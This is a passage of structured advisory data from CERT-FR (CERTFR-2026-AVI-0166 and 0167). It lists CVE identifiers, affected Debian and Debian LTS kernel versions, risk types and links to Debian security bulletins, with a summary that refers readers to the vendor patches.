"name": "CVE-2025-71116",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71116"
},
{
"name": "CVE-2023-52658",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52658"
},
{
"name": "CVE-2025-68362",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68362"
},
{
"name": "CVE-2026-23002",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23002"
},
{
"name": "CVE-2025-68333",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68333"
},
{
"name": "CVE-2025-71160",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71160"
},
{
"name": "CVE-2024-58096",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58096"
},
{
"name": "CVE-2025-71162",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71162"
},
{
"name": "CVE-2026-23075",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23075"
},
{
"name": "CVE-2025-68803",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68803"
},
{
"name": "CVE-2026-22996",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22996"
},
{
"name": "CVE-2026-23105",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23105"
},
{
"name": "CVE-2026-22976",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22976"
},
{
"name": "CVE-2026-23065",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23065"
},
{
"name": "CVE-2025-68753",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68753"
},
{
"name": "CVE-2025-68781",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68781"
},
{
"name": "CVE-2025-68369",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68369"
},
{
"name": "CVE-2025-68775",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68775"
},
{
"name": "CVE-2025-71112",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71112"
},
{
"name": "CVE-2023-54285",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54285"
},
{
"name": "CVE-2026-23086",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23086"
},
{
"name": "CVE-2025-22022",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22022"
},
{
"name": "CVE-2025-68818",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68818"
},
{
"name": "CVE-2025-40170",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40170"
},
{
"name": "CVE-2025-38125",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38125"
},
{
"name": "CVE-2025-71148",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71148"
},
{
"name": "CVE-2025-68366",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68366"
},
{
"name": "CVE-2025-68815",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68815"
},
{
"name": "CVE-2025-40215",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40215"
},
{
"name": "CVE-2025-71193",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71193"
},
{
"name": "CVE-2026-23095",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23095"
},
{
"name": "CVE-2025-68346",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68346"
},
{
"name": "CVE-2025-71163",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71163"
},
{
"name": "CVE-2026-23062",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23062"
},
{
"name": "CVE-2025-71096",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71096"
},
{
"name": "CVE-2025-71099",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71099"
},
{
"name": "CVE-2025-71095",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71095"
},
{
"name": "CVE-2025-71105",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71105"
},
{
"name": "CVE-2025-68266",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68266"
},
{
"name": "CVE-2025-68771",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68771"
},
{
"name": "CVE-2025-68363",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68363"
},
{
"name": "CVE-2026-22984",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22984"
},
{
"name": "CVE-2025-68757",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68757"
},
{
"name": "CVE-2024-58097",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58097"
},
{
"name": "CVE-2025-71068",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71068"
},
{
"name": "CVE-2026-23033",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23033"
},
{
"name": "CVE-2025-68784",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68784"
},
{
"name": "CVE-2026-22977",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22977"
},
{
"name": "CVE-2026-23003",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23003"
},
{
"name": "CVE-2025-68766",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68766"
},
{
"name": "CVE-2026-23076",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23076"
},
{
"name": "CVE-2025-68792",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68792"
},
{
"name": "CVE-2025-71123",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71123"
},
{
"name": "CVE-2025-68206",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68206"
},
{
"name": "CVE-2025-71100",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71100"
},
{
"name": "CVE-2025-68372",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68372"
},
{
"name": "CVE-2026-23010",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23010"
},
{
"name": "CVE-2025-71146",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71146"
},
{
"name": "CVE-2025-71137",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71137"
},
{
"name": "CVE-2026-23084",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23084"
},
{
"name": "CVE-2026-22979",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22979"
},
{
"name": "CVE-2026-23011",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23011"
},
{
"name": "CVE-2025-71156",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71156"
},
{
"name": "CVE-2025-40276",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40276"
},
{
"name": "CVE-2026-23110",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23110"
},
{
"name": "CVE-2025-68809",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68809"
},
{
"name": "CVE-2025-71120",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71120"
},
{
"name": "CVE-2026-23060",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23060"
},
{
"name": "CVE-2025-68817",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68817"
},
{
"name": "CVE-2025-71119",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71119"
},
{
"name": "CVE-2025-68787",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68787"
},
{
"name": "CVE-2025-68782",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68782"
},
{
"name": "CVE-2025-71197",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71197"
},
{
"name": "CVE-2025-68758",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68758"
},
{
"name": "CVE-2026-23031",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23031"
},
{
"name": "CVE-2025-71113",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71113"
},
{
"name": "CVE-2025-71127",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71127"
},
{
"name": "CVE-2026-23102",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23102"
},
{
"name": "CVE-2026-22998",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22998"
},
{
"name": "CVE-2026-23050",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23050"
},
{
"name": "CVE-2025-68340",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68340"
},
{
"name": "CVE-2025-40110",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40110"
},
{
"name": "CVE-2025-40325",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40325"
},
{
"name": "CVE-2025-68798",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68798"
},
{
"name": "CVE-2025-68336",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68336"
},
{
"name": "CVE-2025-68810",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68810"
},
{
"name": "CVE-2026-23097",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23097"
},
{
"name": "CVE-2025-71198",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71198"
},
{
"name": "CVE-2025-68819",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68819"
},
{
"name": "CVE-2025-71072",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71072"
},
{
"name": "CVE-2026-23021",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23021"
},
{
"name": "CVE-2025-68732",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68732"
},
{
"name": "CVE-2026-23093",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23093"
},
{
"name": "CVE-2025-71183",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71183"
},
{
"name": "CVE-2025-68371",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68371"
},
{
"name": "CVE-2025-68211",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68211"
},
{
"name": "CVE-2025-71091",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71091"
},
{
"name": "CVE-2026-23053",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23053"
},
{
"name": "CVE-2025-71184",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71184"
},
{
"name": "CVE-2025-68263",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68263"
},
{
"name": "CVE-2025-68800",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68800"
},
{
"name": "CVE-2025-68261",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68261"
},
{
"name": "CVE-2025-71149",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71149"
},
{
"name": "CVE-2025-68767",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68767"
},
{
"name": "CVE-2025-68727",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68727"
},
{
"name": "CVE-2026-23080",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23080"
},
{
"name": "CVE-2025-38361",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38361"
},
{
"name": "CVE-2025-38248",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38248"
},
{
"name": "CVE-2025-68264",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68264"
},
{
"name": "CVE-2025-68764",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68764"
}
],
"initial_release_date": "2026-02-13T00:00:00",
"last_revision_date": "2026-02-13T00:00:00",
"links": [],
"reference": "CERTFR-2026-AVI-0166",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2026-02-13T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
},
{
"description": "\u00c9l\u00e9vation de privil\u00e8ges"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans le noyau Linux de Debian. Elles permettent \u00e0 un attaquant de provoquer une \u00e9l\u00e9vation de privil\u00e8ges, une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es et un d\u00e9ni de service.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans le noyau Linux de Debian",
"vendor_advisories": [
{
"published_at": "2026-02-09",
"title": "Bulletin de s\u00e9curit\u00e9 Debian DSA-6127-1",
"url": "https://lists.debian.org/debian-security-announce/2026/msg00036.html"
},
{
"published_at": "2026-02-09",
"title": "Bulletin de s\u00e9curit\u00e9 Debian DSA-6126-1",
"url": "https://lists.debian.org/debian-security-announce/2026/msg00035.html"
}
]
}
CERTFR-2026-AVI-0167
Vulnerability from certfr_avis - Published: 2026-02-13 - Updated: 2026-02-13
De multiples vulnérabilités ont été découvertes dans le noyau Linux de Debian LTS. Elles permettent à un attaquant de provoquer une élévation de privilèges, une atteinte à la confidentialité des données et un déni de service.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
NoneImpacted products
References
| Title | Publication Time | Tags | ||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Debian LTS bullseye versions ant\u00e9rieures \u00e0 5.10.249-1",
"product": {
"name": "Debian",
"vendor": {
"name": "Debian",
"scada": false
}
}
},
{
"description": "Debian LTS bullseye versions ant\u00e9rieures \u00e0 6.1.162-1~deb11u1",
"product": {
"name": "Debian",
"vendor": {
"name": "Debian",
"scada": false
}
}
}
],
"affected_systems_content": null,
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2024-36903",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36903"
},
{
"name": "CVE-2025-71075",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71075"
},
{
"name": "CVE-2025-71086",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71086"
},
{
"name": "CVE-2025-22083",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22083"
},
{
"name": "CVE-2025-22107",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22107"
},
{
"name": "CVE-2026-23098",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23098"
},
{
"name": "CVE-2025-71094",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71094"
},
{
"name": "CVE-2025-68788",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68788"
},
{
"name": "CVE-2025-68778",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68778"
},
{
"name": "CVE-2026-23054",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23054"
},
{
"name": "CVE-2025-71064",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71064"
},
{
"name": "CVE-2025-68725",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68725"
},
{
"name": "CVE-2025-68795",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68795"
},
{
"name": "CVE-2025-68349",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68349"
},
{
"name": "CVE-2025-38104",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38104"
},
{
"name": "CVE-2025-68380",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68380"
},
{
"name": "CVE-2025-39702",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39702"
},
{
"name": "CVE-2026-23069",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23069"
},
{
"name": "CVE-2023-53421",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53421"
},
{
"name": "CVE-2026-22992",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22992"
},
{
"name": "CVE-2022-49465",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49465"
},
{
"name": "CVE-2025-71071",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71071"
},
{
"name": "CVE-2025-71191",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71191"
},
{
"name": "CVE-2025-68728",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68728"
},
{
"name": "CVE-2025-68364",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68364"
},
{
"name": "CVE-2025-71087",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71087"
},
{
"name": "CVE-2025-40039",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40039"
},
{
"name": "CVE-2025-68746",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68746"
},
{
"name": "CVE-2025-68773",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68773"
},
{
"name": "CVE-2025-71133",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71133"
},
{
"name": "CVE-2026-23020",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23020"
},
{
"name": "CVE-2025-68796",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68796"
},
{
"name": "CVE-2022-49168",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49168"
},
{
"name": "CVE-2025-68804",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68804"
},
{
"name": "CVE-2025-68769",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68769"
},
{
"name": "CVE-2025-71189",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71189"
},
{
"name": "CVE-2025-38408",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38408"
},
{
"name": "CVE-2025-71088",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71088"
},
{
"name": "CVE-2026-23090",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23090"
},
{
"name": "CVE-2022-49711",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49711"
},
{
"name": "CVE-2026-23064",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23064"
},
{
"name": "CVE-2025-38591",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38591"
},
{
"name": "CVE-2025-68806",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68806"
},
{
"name": "CVE-2025-71098",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71098"
},
{
"name": "CVE-2025-71078",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71078"
},
{
"name": "CVE-2025-71083",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71083"
},
{
"name": "CVE-2026-23061",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23061"
},
{
"name": "CVE-2025-68813",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68813"
},
{
"name": "CVE-2026-23047",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23047"
},
{
"name": "CVE-2025-22121",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22121"
},
{
"name": "CVE-2025-68365",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68365"
},
{
"name": "CVE-2025-71085",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71085"
},
{
"name": "CVE-2025-68344",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68344"
},
{
"name": "CVE-2025-71154",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71154"
},
{
"name": "CVE-2025-68257",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68257"
},
{
"name": "CVE-2025-71084",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71084"
},
{
"name": "CVE-2026-23049",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23049"
},
{
"name": "CVE-2022-49743",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49743"
},
{
"name": "CVE-2025-68347",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68347"
},
{
"name": "CVE-2025-68814",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68814"
},
{
"name": "CVE-2025-68780",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68780"
},
{
"name": "CVE-2025-71081",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71081"
},
{
"name": "CVE-2026-23101",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23101"
},
{
"name": "CVE-2026-23099",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23099"
},
{
"name": "CVE-2025-71121",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71121"
},
{
"name": "CVE-2025-38022",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38022"
},
{
"name": "CVE-2026-23085",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23085"
},
{
"name": "CVE-2025-71136",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71136"
},
{
"name": "CVE-2025-68354",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68354"
},
{
"name": "CVE-2025-68801",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68801"
},
{
"name": "CVE-2025-22090",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22090"
},
{
"name": "CVE-2025-68258",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68258"
},
{
"name": "CVE-2025-39871",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39871"
},
{
"name": "CVE-2025-37926",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37926"
},
{
"name": "CVE-2025-68291",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68291"
},
{
"name": "CVE-2026-22991",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22991"
},
{
"name": "CVE-2025-21946",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21946"
},
{
"name": "CVE-2025-68255",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68255"
},
{
"name": "CVE-2026-22980",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22980"
},
{
"name": "CVE-2025-71093",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71093"
},
{
"name": "CVE-2025-71102",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71102"
},
{
"name": "CVE-2025-68759",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68759"
},
{
"name": "CVE-2026-23019",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23019"
},
{
"name": "CVE-2025-68733",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68733"
},
{
"name": "CVE-2026-23005",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23005"
},
{
"name": "CVE-2025-68335",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68335"
},
{
"name": "CVE-2025-71079",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71079"
},
{
"name": "CVE-2026-23030",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23030"
},
{
"name": "CVE-2026-22997",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22997"
},
{
"name": "CVE-2025-71196",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71196"
},
{
"name": "CVE-2025-68772",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68772"
},
{
"name": "CVE-2026-23078",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23078"
},
{
"name": "CVE-2025-68785",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68785"
},
{
"name": "CVE-2025-71130",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71130"
},
{
"name": "CVE-2025-68808",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68808"
},
{
"name": "CVE-2025-68223",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68223"
},
{
"name": "CVE-2025-68783",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68783"
},
{
"name": "CVE-2025-71147",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71147"
},
{
"name": "CVE-2025-68724",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68724"
},
{
"name": "CVE-2026-23103",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23103"
},
{
"name": "CVE-2026-23074",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23074"
},
{
"name": "CVE-2025-71126",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71126"
},
{
"name": "CVE-2025-68786",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68786"
},
{
"name": "CVE-2025-71199",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71199"
},
{
"name": "CVE-2024-42079",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42079"
},
{
"name": "CVE-2025-68797",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68797"
},
{
"name": "CVE-2024-49968",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49968"
},
{
"name": "CVE-2025-68259",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68259"
},
{
"name": "CVE-2025-71125",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71125"
},
{
"name": "CVE-2026-23006",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23006"
},
{
"name": "CVE-2025-71108",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71108"
},
{
"name": "CVE-2025-71069",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71069"
},
{
"name": "CVE-2026-22994",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22994"
},
{
"name": "CVE-2026-23083",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23083"
},
{
"name": "CVE-2025-68774",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68774"
},
{
"name": "CVE-2026-23108",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23108"
},
{
"name": "CVE-2025-38119",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38119"
},
{
"name": "CVE-2025-71180",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71180"
},
{
"name": "CVE-2025-38232",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38232"
},
{
"name": "CVE-2025-71194",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71194"
},
{
"name": "CVE-2025-37830",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37830"
},
{
"name": "CVE-2026-22999",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22999"
},
{
"name": "CVE-2025-71082",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71082"
},
{
"name": "CVE-2026-23068",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23068"
},
{
"name": "CVE-2025-68765",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68765"
},
{
"name": "CVE-2026-23089",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23089"
},
{
"name": "CVE-2025-71132",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71132"
},
{
"name": "CVE-2026-23071",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23071"
},
{
"name": "CVE-2026-23056",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23056"
},
{
"name": "CVE-2025-71077",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71077"
},
{
"name": "CVE-2024-36927",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36927"
},
{
"name": "CVE-2023-54321",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54321"
},
{
"name": "CVE-2025-22111",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22111"
},
{
"name": "CVE-2026-23063",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23063"
},
{
"name": "CVE-2026-23073",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23073"
},
{
"name": "CVE-2025-71114",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71114"
},
{
"name": "CVE-2026-23058",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23058"
},
{
"name": "CVE-2025-71182",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71182"
},
{
"name": "CVE-2026-23038",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23038"
},
{
"name": "CVE-2026-22990",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22990"
},
{
"name": "CVE-2025-71186",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71186"
},
{
"name": "CVE-2025-68821",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68821"
},
{
"name": "CVE-2026-23026",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23026"
},
{
"name": "CVE-2025-68325",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68325"
},
{
"name": "CVE-2025-71190",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71190"
},
{
"name": "CVE-2026-23107",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23107"
},
{
"name": "CVE-2025-68332",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68332"
},
{
"name": "CVE-2025-71104",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71104"
},
{
"name": "CVE-2026-22978",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22978"
},
{
"name": "CVE-2025-38129",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38129"
},
{
"name": "CVE-2026-23037",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23037"
},
{
"name": "CVE-2026-23001",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23001"
},
{
"name": "CVE-2025-68367",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68367"
},
{
"name": "CVE-2025-68820",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68820"
},
{
"name": "CVE-2023-54207",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54207"
},
{
"name": "CVE-2025-68740",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68740"
},
{
"name": "CVE-2025-68742",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68742"
},
{
"name": "CVE-2026-23025",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23025"
},
{
"name": "CVE-2024-46786",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-46786"
},
{
"name": "CVE-2025-68816",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68816"
},
{
"name": "CVE-2025-68256",
